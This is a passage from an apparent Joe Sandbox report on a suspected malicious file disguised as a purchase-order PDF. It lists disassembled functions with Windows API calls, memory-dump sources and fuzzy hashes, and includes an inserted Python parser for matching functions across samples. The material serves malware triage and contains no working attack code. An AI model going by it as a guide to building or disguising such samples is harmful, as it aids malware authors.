• Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
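The per-function records above (API references with their `ref:` addresses, subcall attribution, and the Opcode / Instruction fuzzy hashes) are what an analyst pivots on to match the same function across repacked samples. The following parser is an added example, not code from Joe Sandbox or from the report; it turns such records into structured data and indexes them by fuzzy hash. The embedded sample text is copied from two records in this section (the GDI record's Similarity fields lie outside this section and are omitted); the field names, the `MODULE!Api` naming and the `Download File` clean-up are assumptions about how the rendered report text looks when pasted.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records into structured data.

Added example (not Joe Sandbox code): each record starts at an 'APIs' header
and carries API references, memory-dump provenance and fuzzy hashes.
"""
import re
from typing import Dict, List, Optional

# One API reference bullet, optionally attributed to a subcall, e.g.
#   MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
#   Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")
SECTION_HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_records(text: str) -> List[Dict]:
    """Split pasted report text into per-function records, one per 'APIs' header."""
    records: List[Dict] = []
    current: Optional[Dict] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\u2022").strip()  # drop indentation and bullet
        if not line:
            continue
        if line == "APIs":
            current = {"apis": [], "fields": {}}
            records.append(current)
            continue
        if current is None or line in SECTION_HEADERS:
            continue
        # 'Download File' is link text from the web page, not part of the value.
        line = line.replace("Download File", "").rstrip()
        m = API_RE.match(line)
        if m:
            current["apis"].append({
                "api": m.group("api"),
                "module": m.group("module"),
                "args": [a for a in m.group("args").split(",") if a != ""],
                "ref": int(m.group("ref"), 16),
                "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
            })
            continue
        m = KV_RE.match(line)
        if m:
            # Repeated keys (e.g. 'Associated') accumulate into a list, in order.
            key, value = m.group("key").strip(), m.group("value").strip()
            current["fields"].setdefault(key, []).append(value)
    return records


def api_sequence(record: Dict, direct_only: bool = True) -> List[str]:
    """'MODULE!Api' names in reference order; subcall-attributed refs are dropped by default."""
    return [f"{a['module']}!{a['api']}" for a in record["apis"]
            if not (direct_only and a["subcall"] is not None)]


def index_by_hash(records: List[Dict], key: str = "Opcode Fuzzy Hash") -> Dict[str, List[int]]:
    """Map a fuzzy-hash value to the indices of the records carrying it.

    The same value in two samples' reports is the pivot for 'same function, repacked'.
    """
    idx: Dict[str, List[int]] = {}
    for i, r in enumerate(records):
        for h in r["fields"].get(key, []):
            idx.setdefault(h, []).append(i)
    return idx


# Sample input: two records copied from this section of the report (constructed
# excerpt; the second record's hash fields are outside the section and omitted).
SAMPLE = """\
APIs
\u2022 EnterCriticalSection.KERNEL32(?), ref: 0044B60B
\u2022 InterlockedExchange.KERNEL32(?,?), ref: 0044B619
\u2022 LeaveCriticalSection.KERNEL32(?), ref: 0044B630
\u2022 LeaveCriticalSection.KERNEL32(?), ref: 0044B641
Memory Dump Source
\u2022 Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
\u2022 Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
\u2022 API ID: CriticalSection$Leave$EnterExchangeInterlocked
\u2022 String ID:
\u2022 API String ID: 2223660684-0
\u2022 Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
\u2022 Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
APIs
\u2022 Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
\u2022 Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
\u2022 MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
\u2022 LineTo.GDI32(?,00000000,00000002), ref: 004472A0
\u2022 EndPath.GDI32(?), ref: 004472B0
\u2022 StrokePath.GDI32(?), ref: 004472BE
Memory Dump Source
\u2022 Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(api_sequence(rec), rec["fields"].get("Opcode Fuzzy Hash"))
```

Run it over the whole pasted Disassembly section of two reports, then intersect the keys of `index_by_hash` from each; matching Opcode Fuzzy Hash values identify functions shared between the samples even when the surrounding code has been repacked. The `ref:` addresses are kept as integers so they can be rebased against the `Offset:` of the source dump.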
APIs
• Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
• Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
• Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
• Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
• Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
• MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
• LineTo.GDI32(?,00000000,00000002), ref: 004472A0
• EndPath.GDI32(?), ref: 004472B0
• StrokePath.GDI32(?), ref: 004472BE
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2783949968-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                                                                                                                                                            • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 00417D1A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 00417D31
                                                                                                                                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 00417D4F
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3521780317-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00471144
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0047114D
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                                                                                                                                                                                            • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00471102
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
• Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
• Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
• Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
APIs
• SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
• GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
• GetCurrentThreadId.KERNEL32 ref: 004389DA
• AttachThreadInput.USER32(00000000), ref: 004389E1
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
• Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
• Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
• Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
• CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
• CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
  • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
  • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
• Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
APIs
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
• __getptd_noexit.LIBCMT ref: 00414080
• __freeptd.LIBCMT ref: 0041408A
• ExitThread.KERNEL32 ref: 00414093
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
• String ID:
• API String ID: 3182216644-0
• Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
• Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
• Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
• Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                            • String ID: $8'I
                                                                                                                                                                                                                                                                                                            • API String ID: 2358735015-3608026889
                                                                                                                                                                                                                                                                                                            • Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                                                                            Strings
Similarity
• API ID: CopyVariant$ContainedObject$ErrorLast_malloc
• String ID: AutoIt3GUI$Container
• API String ID: 3380330463-3941886329
• Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
• Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
• Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
• Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
APIs
• _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• CharUpperBuffW.USER32(?,?), ref: 00409AF5
Strings
Similarity
• API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: 0vH
• API String ID: 1143807570-3662162768
• Opcode ID: b21048a1283864c0ad3d78b56e2ee4487730c72500fe241c006d8f617f3a7356
• Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
• Opcode Fuzzy Hash: b21048a1283864c0ad3d78b56e2ee4487730c72500fe241c006d8f617f3a7356
• Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
Strings
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: HH$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 0-1787419579
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1035cddbf24351551dbdab1ae319d3ef1b3abdfc1c1abeb5567c5d17d410313e
                                                                                                                                                                                                                                                                                                            • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1035cddbf24351551dbdab1ae319d3ef1b3abdfc1c1abeb5567c5d17d410313e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9b5c3065b697658fe030ed6790d4e8a4a56d1a31b4880524271bb7b0dc51ede2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b5c3065b697658fe030ed6790d4e8a4a56d1a31b4880524271bb7b0dc51ede2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
